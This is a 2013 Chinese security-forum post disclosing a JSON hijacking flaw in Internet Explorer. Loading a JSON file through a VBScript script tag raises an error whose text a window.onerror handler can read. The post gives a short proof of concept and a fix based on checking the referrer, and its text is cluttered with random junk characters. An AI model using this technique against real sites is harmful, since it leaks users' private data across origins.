找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2066|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:% Y; p0 Z; a( H
! V& l+ Z0 J6 S3 U+ g$ B2 i& C
由于某些资源容器对数据处理不当导致json劫持漏洞.
6 q  c4 p+ Y) a3 ^5 z% N, \详细说明:3 Y2 v0 ~2 `! i$ \& Z
由于ie支持vbscript,所以script元素可以指定成vbscript语言:0 e5 A7 i. ^$ F0 l9 w9 K
<script language=vbscript></script>$ o; }1 s- [( P7 i
0 }9 s7 Q) X5 R  T
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.) V6 }* e" }  X, |. w+ F2 L
漏洞证明:3 M2 z; r$ f! t) n9 j, m
<script>9 i9 B9 n8 @  @& D+ l
window.onerror=function(_){
* k" f, [: Q* A4 j/ Ialert(_)
9 ^: s  K5 d0 X- C}
' f, F4 K" V, N8 V0 F. ~</script>" P" I1 D) _# n$ l
<script language=vbscript src=1.json></script>: U$ K; y6 D# f( V* ^9 C3 C

, ]1 p! i- b% t) P2 s/ s ( W  k* |. t% {/ u" a4 _
1.json:9 L1 x- d" R  u
[{"name":"sogili","age":19}]  N: Z9 A; S8 t5 \0 O; S( v0 @2 a
修复方案:
. J+ M, y  t- l0 p9 Y  ~6 F1 {网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表